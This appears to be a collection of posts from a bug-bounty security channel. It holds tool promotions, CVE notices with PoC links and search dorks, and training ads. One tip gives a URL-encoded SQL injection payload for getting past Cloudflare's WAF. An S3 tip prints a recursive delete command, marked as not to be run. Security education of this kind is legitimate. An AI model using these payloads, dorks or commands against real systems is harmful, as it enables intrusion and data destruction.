It's LIVE!
SubWatch - your next favorite tool for automated VPS subdomain monitoring!
Supported on VPS
Runs every 6 hours
Sends newly found subdomains directly to your Discord
Includes .txt file + message alerts
Perfect for bug bounty hunters & recon workflows
Watch the YouTube video & get started now:
https://youtu.be/BkpSQKSTFUI
Download & Readme on GitHub:
https://github.com/Brut-Security/SubWatch
Powered by: subfinder, anew, jq, notify
Built by Brut Security
Give it a try, share it with your team, and drop your reactions below!
YouTube
New Subdomain Monitoring Tool for Bug Bounty Hunters! | Brut Security
Introducing SubWatch: Automated Subdomain Monitoring Script by Brut Security
Stay one step ahead in your recon game!
This tool continuously monitors your target domains for new subdomains using subfinder, stores historical data, and sends alerts directly…

CVE-2025-5777 (CitrixBleed 2) - Critical memory leak vulnerability affecting Citrix NetScaler ADC and Gateway devices
Severity: CRITICAL
PoC: https://github.com/win3zz/CVE-2025-5777

CVE-2025-49704: Code Injection in Microsoft SharePoint, 8.8 rating
The vulnerability allows an authenticated attacker to execute code over the network.
Search at Netlas.io:
Link: https://nt.ls/1egrV
Dork: http.headers.microsoftsharepointteamservices:*
Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704

Bug Bounty Tip: Takeover Vulnerable S3 Buckets in Under a Minute!
Want to identify exposed Amazon S3 buckets linked to a target? Here's a quick method:
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon
Then check for public S3 buckets:
aws s3 ls s3://REDACTEDCOM.s3.amazonaws.com
If the bucket name isn't obvious:
echo REDACTED.COM | cariddi -e -s -info
Found a vulnerable bucket? Don't delete anything!
# Do NOT run this. Just for awareness:
aws s3 rm s3://REDACTEDCOM.s3.amazonaws.com --recursive
Always report responsibly. Never exploit: you're here to help, not harm.
Happy Hunting!

Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
Credit: @nav1n0x

SSTImap - Automatic SSTI detection tool with interactive interface
https://github.com/vladko312/SSTImap

Tired of switching tabs for OSINT and recon? Just join our Discord and type sudo help to unlock powerful tools in seconds!
IP & Domain Lookup
Email & Phone OSINT
Subdomain Enumeration
Reverse Image Search
URL & Virus Scanners
Temp Email, QR Tools, and more
You can create and play your own CTF in a minute, right inside Discord!
Try it out now: it's fast, simple, and all in one chat.
https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec

A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.
Download: https://github.com/alihussainzada/BugHunterMethodology/

CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others
https://github.com/spyboy-productions/CloakQuest3r

Scanning GitHub repos is a great way to find juicy information, secrets and credentials!
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
Check this out - https://github.com/trufflesecurity/trufflehog

Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
https://github.com/ill-deed/CVE-2025-34085-Multi-target

CVE-2025-47812: Wing FTP Server Remote Code Execution (RCE) vulnerability
PoC: https://github.com/4m3rr0r/CVE-2025-47812-poc
Dorks:
HUNTER: product.name="Wing FTP Server"

New Batch Starting - August 2025
Brut Practical Web Penetration Testing (bPWP)
We're back with a fresh batch of our most in-demand training, Brut Practical Web Penetration Testing, starting this August!
Learn the art of Web Hacking with:
100% Practical Sessions
Bug Bounty Approach
Real-World Lab Scenarios
Lifetime Community Access
Beginner-Friendly with Advanced Techniques
Ideal for aspiring bug bounty hunters, cybersecurity students, and VAPT professionals.
Limited Seats - Enroll Now
https://brutsec.com/bPWP
For Queries:
Telegram: @wtf_brut
WhatsApp: https://wa.link/brutsecurity | +918945971332
Email: info@brutsec.com